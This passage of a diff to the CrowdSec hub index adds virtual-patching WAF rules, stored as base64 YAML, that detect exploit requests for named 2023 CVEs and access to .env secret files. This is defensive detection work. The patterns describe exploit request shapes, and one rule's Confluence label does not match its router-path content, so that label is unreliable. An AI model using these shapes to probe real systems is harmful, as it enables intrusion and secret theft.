+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjQ0ODkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjQ0ODkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2RvY3VtZW50dW0vdXBsb2FkLmFzcHgKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgLSB1cGxvYWRpZAogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAiLi4iCiAgICAtIHpvbmVzOgogICAgICAtIFJBV19CT0RZCiNpdCBzZWVtcyAnUGFnZV9Mb2FkJyBpcyB0aGUgaGFuZGxlciB0aGF0IGNhbiBiZSBhYnVzZWQsIG1heWJlIHNvbWUgb3RoZXJzIGNhbj8KICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIlBhZ2VfTG9hZCIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2l0cml4IFNoYXJlRmlsZSBSQ0UgKENWRS0yMDIzLTI0NDg5KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjQ0ODkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+ "description": "Detect CVE-2023-24489 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-24489",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-33617": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "27d605f7f1aa991127741c047ca8c4af1e0113feafb2073fd9aa04793c311d6e",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "15df9e2f71f34f037f96f7a9b61e6cbab993f3de3708ee92cda32bec84412391",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "399c24c2222b455a5e9030ad0a31b58261e62724051655f7b98be4cdc8cc96d3",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMzM2MTcgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IHBvc3QKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2JvYWZvcm0vYWRtaW4vZm9ybWxvZ2luCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgICAtIHVzZXJuYW1lCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJhZG1pbiIKICAgIC0gem9uZXM6CiAgICAgIC0gQk9EWV9BUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gcHNkCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJwYXJrcyIKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9ib2Fmb3JtL2FkbWluL2Zvcm1waW5nCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gdGFyZ2V0X2FkZHIKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAiW15hLWYwLTk6Ll0rIgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJBdGxhc3NpYW4gQ29uZmx1ZW5jZSBQcml2ZXNjIChDVkUtMjAyMy0zMzYxNykiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTMzNjE3CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03OA==",
+ "description": "Detect CVE-2023-33617 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-33617",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-78"
+ ],
+ "confidence": 3,
+ "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-34362": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "b032c0e88f383ffb1228287b53f61443eb9c91db1cd730c4e10dd42bf44d86d9",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "be808170ee4c42540423351f6d188b8cd22899810357f188d404a61f07b64dc7",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "f579f526676ecaded1b1048503b9fd738144a67b2f7f0b14d6d770c35aa98cf6",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "1af2e304188e802a2aedc45557e41c2e6debac3d8246ec1e44d57f7d664c9677",
+ "deprecated": false
+ }
+ },
+ "content": "Cm5hbWU6IGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCmRlc2NyaXB0aW9uOiAiRGV0ZWN0IENWRS0yMDIzLTM0MzYyIGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiAvbW92ZWl0aXNhcGkvbW92ZWl0aXNhcGkuZGxsCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAtIGFjdGlvbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBlcXVhbHMKICAgICAgICB2YWx1ZTogbTIKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICd4LXNpbG9jay10cmFuc2FjdGlvbicKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAtIGxvd2VyY2FzZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAnLit4LXNpbG9jay10cmFuc2FjdGlvbicKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiTU9WRWl0IFRyYW5zZmVyIC0gUmVtb3RlIENvZGUgRXhlY3V0aW9uIChDVkUtMjAyMy0zNDM2MikiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTM0MzYyCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS04OQ==",
+ "description": "Detect CVE-2023-34362 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-34362",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-89"
+ ],
+ "confidence": 3,
+ "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-3519": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "459cd434b8da480eaa0bfbbefc9806ca8c445a64757cbd339f1f7b6b32082f6f",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "57441c54adbcb8cd88ba205b1f1358dfc10c1779662efe7e9854469b986c5f54",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUxOQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAyMy0zNTE5IGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIE1FVEhPRAogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBlcXVhbHMKICAgICAgICB2YWx1ZTogR0VUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9nd3Rlc3QvZm9ybXNzc28KICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgICAtIHRhcmdldAogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbGVuZ3RoCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGd0ZQogICAgICAgIHZhbHVlOiAxMDAKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2l0cml4IFJDRSAoQ1ZFLTIwMjMtMzUxOSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTM1MTkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk0",
+ "description": "Detect CVE-2023-3519 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-3519",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-94"
+ ],
+ "confidence": 3,
+ "label": "Citrix RCE (CVE-2023-3519)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-38205": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "d2c3666c0a337304d92b737ca02ad1aed164e31439eb6596a848688f0c27b178",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzgyMDUKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMzgyMDUgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogLi5jZmlkZS93aXphcmRzL2NvbW1vbi8KbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQWRvYmUgQ29sZEZ1c2lvbiBhY2Nlc3MgY29udHJvbCBieXBhc3MgKENWRS0yMDIzLTM4MjA1KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMzgyMDUKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+ "description": "Detect CVE-2023-38205 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-38205",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-40044": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "2e8db7d8cb223e1cb1a57c4621b1720d88174c3398183948c8901645f78ee338",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "e49809530908e16a9628fece23d934be09d9756fc64f795d7311e70565a2f32e",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDAwNDQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNDAwNDQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2FodC8KICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gYjY0ZGVjb2RlCiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGNvbnRhaW5zCiAgICAgICAgdmFsdWU6ICI8czpzdHJpbmc+Y21kPC9zOnN0cmluZz4iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIldTX0ZUUCAuTkVUIGRlc2VyaWFsaXplIFJDRSAoQ1ZFLTIwMjMtNDAwNDQpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyMy00MDA0NAogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtNTAyCgoK",
+ "description": "Detect CVE-2023-40044 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-40044",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-502"
+ ],
+ "confidence": 3,
+ "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-42793": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "86fb6a193e9799612bf00b67894f7aabe4482f024a012f305b2cfa910384aa73",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDI3OTMKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNDI3OTMiCnJ1bGVzOgogIC0gem9uZXM6CiAgICAtIFVSSQogICAgdHJhbnNmb3JtOgogICAgLSBsb3dlcmNhc2UKICAgIG1hdGNoOgogICAgICB0eXBlOiBlbmRzV2l0aAogICAgICB2YWx1ZTogL3JwYzIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiSmV0QnJhaW5zIFRlYW1jaXR5IGF1dGggYnlwYXNzIChDVkUtMjAyMy00Mjc5MykiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTQyNzkzCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS0yODgK",
+ "description": "Detect CVE-2023-42793",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-42793",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-288"
+ ],
+ "confidence": 3,
+ "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-50164": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "2af3917de29ccf7f71d43b78502602568b2d4582769e62ffb9c195fcfab33e90",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "05c4eb4526d99bc0c9cbefbcc60e2fde6f93f5b0f41ea500565f791ae57ed67e",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNTAxNjQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogdXBsb2FkLmFjdGlvbgogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKICAgIC0gem9uZXM6CiAgICAgIC0gQk9EWV9BUkdTCiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gdXBsb2FkRmlsZU5hbWUKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIi4uLyIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQXBhY2hlIFN0cnV0czIgKENWRS0yMDIzLTUwMTY0KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtNTAxNjQKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTU1MgoKCg==",
+ "description": "Detect CVE-2023-50164 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-50164",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-552"
+ ],
+ "confidence": 3,
+ "label": "Apache Struts2 (CVE-2023-50164)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-env-access": {
+ "path": "appsec-rules/crowdsecurity/vpatch-env-access.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "ae22c494fb05801bc4886564e63927ccc248be20b1d1dc31f1011a27a4d75cbe",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtZW52LWFjY2VzcwpkZXNjcmlwdGlvbjogIkRldGVjdCBhY2Nlc3MgdG8gLmVudiBmaWxlcyIKcnVsZXM6CiAgLSB6b25lczoKICAgIC0gVVJJCiAgICB0cmFuc2Zvcm06CiAgICAtIGxvd2VyY2FzZQogICAgbWF0Y2g6CiAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgIHZhbHVlOiAvLmVudgpsYWJlbHM6CiAgdHlwZTogc2NhbgogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOnNjYW4iCiAgbGFiZWw6ICJBY2Nlc3MgdG8gLmVudiBmaWxlIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAo=",
+ "description": "Detect access to .env files",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:scan",
+ "classification": [
+ "attack.T1595",
+ "attack.T1190"
+ ],
+ "confidence": 3,
+ "label": "Access to .env file",
+ "service": "http",
+ "spoofable": 0,
+ "type": "scan"
+ }
+ }
+ },
"collections": {
"Dominic-Wagner/vaultwarden": {
"path": "collections/Dominic-Wagner/vaultwarden.yml",
@@ -530,6 +1243,97 @@
"crowdsecurity/vsftpd"
]
},
+ "crowdsecurity/appsec-crs": {
+ "path": "collections/crowdsecurity/appsec-crs.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "61d5e358aa86b872300e540be39b066c278567c4948bb74d4e4f339bbb126154",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "7f56cb3fa217f983d1648e6aea36d399be444e09046c0b5b23e7eb55480eaf89",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+ "deprecated": false
+ }
+ },
+ "long_description": "IyBNb2RTZWN1cml0eSBDUlMKCg==",
+ "content": "cGFyc2VyczoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjLWxvZ3MKYXBwc2VjLWNvbmZpZ3M6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwpkZXNjcmlwdGlvbjogIkFwcHNlYzogTW9kc2VjdXJpdHkgY29yZSBydWxlIHNldCBydWxlcyIKYXV0aG9yOiBjcm93ZHNlY3VyaXR5CnRhZ3M6CiAgLSBsaW51eAogIC0gaHR0cAogIC0gYXBwc2VjCiAgLSBtb2RzZWN1cml0eQo=",
+ "description": "Appsec: Modsecurity core rule set rules",
+ "author": "crowdsecurity",
+ "labels": null,
+ "parsers": [
+ "crowdsecurity/appsec-logs"
+ ],
+ "appsec-rules": [
+ "crowdsecurity/crs"
+ ],
+ "appsec-configs": [
+ "crowdsecurity/crs"
+ ]
+ },
+ "crowdsecurity/appsec-virtual-patching": {
+ "path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "4bacd3307cc84a5498d0939c83df3eccf40f430d4eedbdc1f7e7ae1fb8b71676",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "28962f063f10702629018df810167378d8250185ab8d64f4f5d1454b14dd1d4f",
+ "deprecated": false
+ }
+ },
+ "long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBmcm9tIHRoZSBbQ0lTQSBLbm93biBFeHBsb2l0ZWQgVnVsbmVyYWJpbGl0aWVzIENhdGFsb2ddKGh0dHBzOi8vd3d3LmNpc2EuZ292L2tub3duLWV4cGxvaXRlZC12dWxuZXJhYmlsaXRpZXMtY2F0YWxvZykuIFRoZSBnb2FsIGlzIHRvIHByb3ZpZGUgdmlydHVhbCBwYXRjaGluZyBjYXBhYmlsaXRpZXMgZm9yIHRoZSBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcG9wbGUgc2NvdXRpbmcgeW91ciBhcHBsaWNhdGlvbnMgZm9yIGp1aWN5IHZ1bG5lcmFiaWxpdGllcy4K",
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdmlydHVhbC1wYXRjaGluZwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2Jhc2UtY29uZmlnCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1lbnYtYWNjZXNzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi0zNTkxNAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMjUxNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTE5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00Mjc5MwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM4MjA1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yNDQ4OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEyOTg5CiAgLSBjcm93ZHNlY3